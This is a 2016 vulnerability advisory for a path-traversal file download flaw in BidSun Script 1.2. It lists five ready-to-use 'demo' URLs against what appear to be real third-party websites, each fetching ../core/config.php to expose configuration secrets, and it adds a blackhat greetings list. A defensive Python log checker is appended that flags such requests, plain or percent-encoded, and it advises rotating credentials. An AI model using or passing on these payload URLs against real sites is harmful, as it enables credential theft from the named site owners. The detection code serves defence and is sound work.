/***********************************************************************************
** Exploit Title: BidSun Script Local File Download Vulnerability
** Exploit Author: FullSecurity.org
** Discovered By: Milad Hacking
** Vendor Homepage : http://bidsun.ir/
** Demo Script Link: http://bidsun.ir/demo/
** Version : 1.2
** Date: 2016-01-13
** Tested on: Kali Linux / Iceweasel
***********************************************************************************
** Demo :
http://knownsunknowns.com/index.php?mod=download&met=downFile&fileName=../core/config.php
http://boloorbook.com/index.php?mod=download&met=downFile&fileName=../core/config.php
http://arman.rahimzadeh.ir/index.php?mod=download&met=downFile&fileName=../core/config.php
http://www.waresin.ir/index.php?mod=download&met=downFile&fileName=../core/config.php
http://www.touristban.com/index.php?mod=download&met=downFile&fileName=../core/config.php
***********************************************************************************
** Special thanks to: iliya Norton - Milad Hacking - Mohamad Ghasemi - irhblackhat - distr0watch - N3TC4T - Mohamad Nofozi - Mr.G}{o$t - s4livan - MRS4JJ4D - SeCrEt_HaCkEr - Xodiak Blackhat - Shadow_Walker <3
***********************************************************************************
https://telegram.me/thehacking
http://FullSecurity.org
milad.hacking.blackhat@Gmail.com
***********************************************************************************
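
Added example (not part of the original advisory): a log check that flags requests to the download handler shown above (mod=download, met=downFile) whose fileName parameter leaves the download directory. The combined access-log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines; client addresses are documentation-range placeholders.
SAMPLE_LOG = [
    '198.51.100.7 - - [13/Jan/2016:10:01:02 +0000] "GET /index.php?mod=download&met=downFile&fileName=catalog.pdf HTTP/1.1" 200 48211',
    '198.51.100.9 - - [13/Jan/2016:10:01:05 +0000] "GET /index.php?mod=download&met=downFile&fileName=../core/config.php HTTP/1.1" 200 913',
    '198.51.100.23 - - [13/Jan/2016:10:02:40 +0000] "GET /index.php?mod=download&met=downFile&fileName=%2e%2e%2fcore%2fconfig.php HTTP/1.1" 200 913',
    '198.51.100.3 - - [13/Jan/2016:10:03:11 +0000] "GET /index.php?mod=news&id=4 HTTP/1.1" 200 5120',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def normalize(name, max_rounds=5):
    """Percent-decode until the value stops changing, then unify path separators."""
    for _ in range(max_rounds):
        decoded = unquote(name)
        if decoded == name:
            break
        name = decoded
    return name.replace("\\", "/")

def is_traversal(name):
    """True if a normalized name is absolute, holds a NUL byte, or has a '..' segment."""
    return name.startswith("/") or "\x00" in name or ".." in name.split("/")

def find_traversal_downloads(lines):
    """Return (client, normalized fileName) for each suspicious download request."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = parse_qs(urlsplit(match.group(1)).query)
        # Only the handler named in the advisory is of interest here.
        if query.get("mod") != ["download"] or query.get("met") != ["downFile"]:
            continue
        for raw in query.get("fileName", []):
            name = normalize(raw)
            if is_traversal(name):
                hits.append((line.split()[0], name))
    return hits

if __name__ == "__main__":
    for client, name in find_traversal_downloads(SAMPLE_LOG):
        print(f"{client} requested {name!r} outside the download directory")
```

A hit that was answered with status 200 for a file such as core/config.php means any credentials stored in that file should be treated as exposed and rotated.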